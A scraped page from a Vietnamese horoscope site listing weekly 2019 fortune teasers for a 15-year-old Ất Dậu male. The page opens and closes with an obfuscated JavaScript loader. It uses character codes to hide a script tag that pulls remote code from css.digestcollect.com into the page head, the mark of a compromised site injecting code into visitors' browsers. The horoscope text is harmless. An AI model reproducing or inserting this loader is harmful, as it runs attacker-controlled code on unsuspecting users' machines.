Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Tử vi-Phong thủy

Tử Vi Hàng Tuần Từ ngày 25/11/2019 đến ngày 01/12/2019

TỬ VI HÀNG TUẦN CHO NAM   Nam Ất Dậu 15 tuổi Trong tuần này từ ngày 25 tháng 11 đến ngày 01 tháng 12, Quý Em Trai tuổi Ất Dậu: Diễn tiến của công việc vẫn đều đều. Sẽ có quý nhân tích cực giúp đỡ mang lại nhiều kết quả khả quan. Tài …

Tử Vi Hàng Tuần Từ ngày 25/11/2019 đến ngày 01/12/2019 Read More »

Tử Vi Hàng Tuần Từ ngày 18/11/2019 đến ngày 24/11/2019

TỬ VI HÀNG TUẦN CHO NAM   Nam Ất Dậu 15 tuổi Trong tuần này từ ngày 18 tháng 11 đến ngày 24 tháng 11, Quý Em Trai tuổi Ất Dậu: Diễn tiến của công việc vẫn đều đều. Sẽ có quý nhân tích cực giúp đỡ mang lại nhiều kết quả khả quan. Tài …

Tử Vi Hàng Tuần Từ ngày 18/11/2019 đến ngày 24/11/2019 Read More »

Tử Vi Hàng Tuần Từ ngày 11/11/2019 đến ngày 17/11/2019

TỬ VI HÀNG TUẦN CHO NAM Nam Ất Dậu 15 tuổi Trong tuần này từ ngày 11 tháng 11 đến ngày 17 tháng 11, Quý Em Trai tuổi Ất Dậu: Mọi sự việc trong gia đình như bên ngoài đã ổn định, gặp nhiều hanh thông. Về tiền bạc vẫn được như ý. Người thân …

Tử Vi Hàng Tuần Từ ngày 11/11/2019 đến ngày 17/11/2019 Read More »

Tử Vi Hàng Tuần

Tử Vi Hàng Tuần Từ ngày 04/11/2019 đến ngày 10/11/2019

TỬ VI HÀNG TUẦN CHO NAM Nam Ất Dậu 15 tuổi Trong tuần này từ ngày 04 tháng 11 đến ngày 10 tháng 11, Quý Em Trai tuổi Ất Dậu: Muốn mưu cầu chuyện gì thì đây là thời điểm thuận lợi rồi, nên tiến hành ngay đi. Về chuyện hợp tác, đừng tin người …

Tử Vi Hàng Tuần Từ ngày 04/11/2019 đến ngày 10/11/2019 Read More »

Tử Vi Hàng Tuần

Tử Vi Hàng Tuần Từ ngày 28/10/2019 đến ngày 03/11/2019

TỬ VI HÀNG TUẦN CHO NAM Nam Ất Dậu 15 tuổi Trong tuần này từ ngày 28 tháng 10 đến ngày 03 tháng 11, Quý Em Trai tuổi Ất Dậu: Có những tin tức tốt đẹp tưởng như có thể thay đổi công việc mới một cách thuận lợi. Nhưng đó chỉ là những bước …

Tử Vi Hàng Tuần Từ ngày 28/10/2019 đến ngày 03/11/2019 Read More »

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();